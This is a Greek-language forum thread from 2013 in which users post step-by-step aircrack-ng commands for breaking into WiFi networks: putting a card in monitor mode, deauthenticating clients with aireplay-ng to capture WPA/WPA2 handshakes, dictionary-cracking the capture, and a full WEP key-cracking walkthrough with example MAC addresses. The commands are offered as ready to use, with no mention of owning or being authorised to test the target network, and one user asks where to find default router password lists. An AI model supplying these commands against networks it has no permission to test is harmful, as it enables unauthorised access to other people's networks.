Sirios8e Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 airmon-ng airmon-ng start wlan0 clear airodump-ng mon0 airodump-ng -w WPACap -c (opoio kanali einai) mon0 ''NEW CONSOLE'' aireplay-ng -0 0 -a (router mac) -c (client mac) mon0 ''NEW CONSOLE'' aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst WPACap-01.cap '''PARADEIGMA PROORISMOU''' ειναι για wpa+wpa2....το password.lst ειναι ενα παραδειγμα μπορεις να βαλεις και αλλες λιστες αν διαθετεις απλα δυσκολα εως αδυνατο να εχεις αποτελεσματα...να ξερεις Aπλα, πρεπει ο κωδικος να ειναι στην λιστα, (αλλιως τα παρατας) η αν εχει ενεργοποιησει το wps, oποτε χρειαζετε διαφορετικες εντολες. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 H μονο περίπτωση να βρείς WPA password σε πραγματικές συνθήκες είναι να έχει αφήσει τον default password που συνήθως είναι Alphanumeric 10 ψηφίων. Το password list για alphanumeric είναι κάπου 20gb οποτε δεν ξέρω ποσο γρήγορα θα κανεις parse 20gb. 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 (επεξεργασμένο) H μονο περίπτωση να βρείς WPA password σε πραγματικές συνθήκες είναι να έχει αφήσει τον default password που συνήθως είναι Alphanumeric 10 ψηφίων. Το password list για alphanumeric είναι κάπου 20gb οποτε δεν ξέρω ποσο γρήγορα θα κανεις parse 20gb. η λιστα με τα default password που λες,ξερεις που μπορω να την βρω??? Επεξ/σία 7 Ιουνίου 2013 από Evoliasmenos Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Candlemass Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Καλά, κάθεστε και δίνετε γενικευμένες εντολές, ενώ κάθε περίπτωση είναι ξεχωριστή; Θα ακολουθήσουν άλλα 200 posts που θα ρωτάνε "εμένα γιατί δε μου δουλεύει;". Όλα αυτά υπάρχουν στο wiki της aircrack suite : http://www.aircrack-ng.org/doku.php?id=tutorial&DokuWiki=ddb6d83ee1e71a77eaef63f704c49058 όπου αναλύονται όλοι οι τρόποι επίθεσης και ποιές εντολές χρησιμοποιούνται. Mάθε πρώτα το WEP άμα δεν το εxεις μάθει ήδη και μετά πας στο WPA με την σειρά πάνε αυτά Δεν πάνε με τη σειρά, άλλη προσέγγιση χρειάζεται το WEP (AP association, packet replay/injection, IV generation) και ουσιαστικά η επίθεση γίνεται στα IVs (initialization vectors) - ανάλογα και με την τεχνική, και άλλη το WPA (client dis-association, WPA handshake capture και μετά εφαρμόζεις brute force/dictionary/rainbow table attack). Είπαμε, κάθε περίπτωση είναι ξεχωριστή και θέλει ανάλογη μέθοδο. 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Καλά, κάθεστε και δίνετε γενικευμένες εντολές, ενώ κάθε περίπτωση είναι ξεχωριστή; Θα ακολουθήσουν άλλα 200 posts που θα ρωτάνε "εμένα γιατί δε μου δουλεύει;". Όλα αυτά υπάρχουν στο wiki της aircrack suite : http://www.aircrack-ng.org/doku.php?id=tutorial&DokuWiki=ddb6d83ee1e71a77eaef63f704c49058 όπου αναλύονται όλοι οι τρόποι επίθεσης και ποιές εντολές χρησιμοποιούνται. Δεν πάνε με τη σειρά, άλλη προσέγγιση χρειάζεται το WEP (AP association, packet replay/injection, IV generation) και ουσιαστικά η επίθεση γίνεται στα IVs (initialization vectors) - ανάλογα και με την τεχνική, και άλλη το WPA (client dis-association, WPA handshake capture και μετά εφαρμόζεις brute force/dictionary/rainbow table attack). Είπαμε, κάθε περίπτωση είναι ξεχωριστή και θέλει ανάλογη μέθοδο. δεν ειναι γενικευμενες...ειναι δουλεμενες και αξιοπιστες...ενταξει αν υπαρχει με wps κτλ υπαρχουν και αλλες μεθοδοι η extra κινησεις/εντολες κτλ...απλα μπορει ευκολα να το χρησιμοποιησει,γι'αυτο το ποσταρα... Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Candlemass Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 δεν ειναι γενικευμενες...ειναι δουλεμενες και αξιοπιστες...ενταξει αν υπαρχει με wps κτλ υπαρχουν και αλλες μεθοδοι η extra κινησεις/εντολες κτλ...απλα μπορει ευκολα να το χρησιμοποιησει,γι'αυτο το ποσταρα... Δουλεμένες και αξιόπιστες για ποιά περίπτωση; Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Καλά, κάθεστε και δίνετε γενικευμένες εντολές, ενώ κάθε περίπτωση είναι ξεχωριστή; Θα ακολουθήσουν άλλα 200 posts που θα ρωτάνε "εμένα γιατί δε μου δουλεύει;". Όλα αυτά υπάρχουν στο wiki της aircrack suite : http://www.aircrack-ng.org/doku.php?id=tutorial&DokuWiki=ddb6d83ee1e71a77eaef63f704c49058 όπου αναλύονται όλοι οι τρόποι επίθεσης και ποιές εντολές χρησιμοποιούνται. Δεν πάνε με τη σειρά, άλλη προσέγγιση χρειάζεται το WEP (AP association, packet replay/injection, IV generation) και ουσιαστικά η επίθεση γίνεται στα IVs (initialization vectors) - ανάλογα και με την τεχνική, και άλλη το WPA (client dis-association, WPA handshake capture και μετά εφαρμόζεις brute force/dictionary/rainbow table attack). Είπαμε, κάθε περίπτωση είναι ξεχωριστή και θέλει ανάλογη μέθοδο. Aυτό που ειπωθείτε πριν δεν είναι κάτι γενικό: * Πρώτα κλεινεις το interface σου * Μετά το βάζεις σε monitor mode * Μετά κανεις scan * Μετά παίρνεις το Handshake * και επείτα υπάρχουν ένα σωρό προγράμματα για να κανεις απόπειρα να το σπάσεις. Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP. Αυτό που σε πείραξε μάλλον είναι πως γράφτηκε κώδικας εδώ και θα τον μάθουν και άλλοι κάτι που για κάποιο λόγο δεν θες Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Δουλεμένες και αξιόπιστες για ποιά περίπτωση; για ενα δικτυο με wpa η wpa2 κρυπτογραφηση... Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 O Kωδικας του Evoliasmenos ηταν σωστος. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Candlemass Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP. Αυτό που σε πείραξε μάλλον είναι πως γράφτηκε κώδικας εδώ και θα τον μάθουν και άλλοι κάτι που για κάποιο λόγο δεν θες Το βρήκες Sherlock!! Ειδικά, αφότου έδωσα link στην επίσημη σελίδα με οδηγούς και κώδικα... Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP. Έχουν διαφορετική διαδικασία, αλλά χρειάζεται το ένα για να κάνεις το άλλο... ΠΩΣ ΓΚΕΝΕΝ ΑΤΟ; Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 (επεξεργασμένο) blepoume jpeg1. ( CONSOLE ANOIGMA) Step 2 : Type the command shown below - Command 1: ifconfig wlan0 Command 2: iwconfig wlan0 vlepoume jpeg2. Step 3: Put your Wifi adapter card on Monitor Mode Open a new konsole and enter the command shown below - Type the following command to put your card into Monitor mode . Command : airmon-ng start (your interface) Example : airmon-ng start wlan0 A message is also display on the screen that your monitor mode is enabled. vlepoume jpeg3. Step 4: Display the monitor mode . New monitor mode created named mon0 To see the monitor mode enter the command shown below - Command : iwconfig vlepoume jpeg4. Step 5: Finding a Target Now we have to find the network that is protected by the WEP . To find those networks we use a simple command shown below - Command : airodump-ng mon0 Here airodump-ng is the command to start the program mon0 is the new interface which you created in the earlier step . vlepoume jpeg5. Step 6: Capture the data into file To capture the data we use airodump tool with additional switches like --bssid ( mac address), -c (channel), -w (filename ) Syntax of the commands is - Command : airodump-ng mon0 --bssid (Mac Address) -c (channel no.) -w (filename) Example : airodump-ng mon0 --bssid 00:08:68:2F:C8:C8 -c 1 -w WEPkey vlepoume jpeg6. Step 7: Open Home Directory to check WEPkey file is created or not . Open the Home Directory . Check your WEPkey file is created or not . See the image below - Image shows WEPkey file is created and saved in the home vlepoume jpeg7. Step 8: Crack the WEP Key using Aircrack Tool Open a new konsole . Then enter the command : aircrack-ng (file name) Example : aircrack-ng WEPkey-01.cap Withing a minute aircrack will decrypt your WEP key as shown in the image . vlepoume jpeg8. τα jpegs για wep...... +edit οτι οταν φτανεις στο σημειο που μαζευει πακετα μονο μια φορα αποκρυπτογραφησα κατι με 20000 πακετα (και λιγα παραπανω)...συνηθως η διαδικασια κατα 100% ειναι πετυχημενη οταν φτανεις απο 65000 πακετα εως 85000... Επεξ/σία 7 Ιουνίου 2013 από Evoliasmenos Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Sirios8e Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Aυτό που ειπωθείτε πριν δεν είναι κάτι γενικό: * Πρώτα κλεινεις το interface σου * Μετά το βάζεις σε monitor mode * Μετά κανεις scan * Μετά παίρνεις το Handshake * και επείτα υπάρχουν ένα σωρό προγράμματα για να κανεις απόπειρα να το σπάσεις. Προφανώς πρέπει να μάθεις πρώτα το WEP έχουν διαφορετική διαδικασία ναι αλλα πρώτα μαθαίνεις να μπούσουλας και μετά περπατάς. Πως θα πας να σπάσεις το WPA άμα δεν εxεις καταφέρεις να σπάσεις επιτυχώς WEP. Αυτό που σε πείραξε μάλλον είναι πως γράφτηκε κώδικας εδώ και θα τον μάθουν και άλλοι κάτι που για κάποιο λόγο δεν θες Καλα, αμα κοιταξεις το youtube να φανε και οι κοτες. Αν σ' ενδιαφερει το ψαχνεις και απο μονος σου. Αν δε σ ενδιαφερει ομως. Ειναι το παραδειγμα με το κοκκινο στυλο που αναφερει και ο...αλλος. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Evoliasmenos Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Καλα, αμα κοιταξεις το youtube να φανε και οι κοτες. Αν σ' ενδιαφερει το ψαχνεις και απο μονος σου. Αν δε σ ενδιαφερει ομως. Ειναι το παραδειγμα με το κοκκινο στυλο που αναφερει και ο...αλλος. κοκκινο στυλο....???στο youtube αστο...βρισκεις 1 tutorial στα 5 που να λειτουργει κανονικα και σωστα,πρωτον οι μισοι προσπαθουν ειδικα για wpa/wpa2 να σπασουν το δικο τους κανωντας εισαγωγη το pass τους μεσα σε μια π.χ [email protected] κτλ...κανωντας αυτους που τους ενδιαφερει να νομιζουν οτι ειναι πανευκολο... οπως και αλλα π.χ ενημερωσε αφου μιλας ρε ανθρωπε με μικροφωνο στο βιντεο για μονταζ σε στιγμες οπως στην εμφανιση handshake κτλ που σ'αυτους εμφανιζεται σε 2 με 3 δευτερολεπτα ενω δεν ειναι ετσι...αστο,καλη τυχη σε λεω Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
biomecanoid Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 Το βρήκες Sherlock!! Ειδικά, αφότου έδωσα link στην επίσημη σελίδα με οδηγούς και κώδικα... Έχουν διαφορετική διαδικασία, αλλά χρειάζεται το ένα για να κάνεις το άλλο... ΠΩΣ ΓΚΕΝΕΝ ΑΤΟ; Έχουν διαφορετική διαδικασία, αλλά χρειάζεται το ένα για να κάνεις το άλλο... ΠΩΣ ΓΚΕΝΕΝ ΑΤΟ; Aρχίζεις πρώτα με δοκιμες σε κάτι εύκολο που είναι το WEP και έχει πολλές πιθανότητες να έχει επιτυχια και η διαδικασία δουλεύει σίγουρα άμα εχεις καλο σήμα και δεν είσαι πολύ μακριά από το ΑP. Αφού απόκτησης πειρα στο backtrack, στο aircrack και στο CLI μετά πας στα πιο δύσκολα που είναι το WPA. Στο WPA θέλει και λίγο φαντασία τι θα κανεις με το Handshake αφού το παρεις. Ενώ η διαδικασία του να παρεις το Handshake είναι γνωστη το τι να κανεις το *.cap με το handshake θέλει γνώση και εμπειρία. Tώρα όλα αυτά Candlemass δεν βοηθούνε πουθενά και γυρίζουμε πίσω την συζήτηση εδώ συζητούσαμε τι θα γίνει με το *.cap file και πως θα το κάνουμε Decode γρήγορα σε real world καταστάσεις. Mιλαγαμε για GPU acceleration, computational clusters etc Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Sirios8e Δημοσ. 7 Ιουνίου 2013 Share Δημοσ. 7 Ιουνίου 2013 κοκκινο στυλο....???στο youtube αστο...βρισκεις 1 tutorial στα 5 που να λειτουργει κανονικα και σωστα,πρωτον οι μισοι προσπαθουν ειδικα για wpa/wpa2 να σπασουν το δικο τους κανωντας εισαγωγη το pass τους μεσα σε μια π.χ [email protected] κτλ...κανωντας αυτους που τους ενδιαφερει να νομιζουν οτι ειναι πανευκολο... οπως και αλλα π.χ ενημερωσε αφου μιλας ρε ανθρωπε με μικροφωνο στο βιντεο για μονταζ σε στιγμες οπως στην εμφανιση handshake κτλ που σ'αυτους εμφανιζεται σε 2 με 3 δευτερολεπτα ενω δεν ειναι ετσι...αστο,καλη τυχη σε λεω Sυμφωνω απολυτως, απλα δειχνουν την διαδικασια, τα βηματα που πρεπει ν' ακολουθησεις. 1 Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Προτεινόμενες αναρτήσεις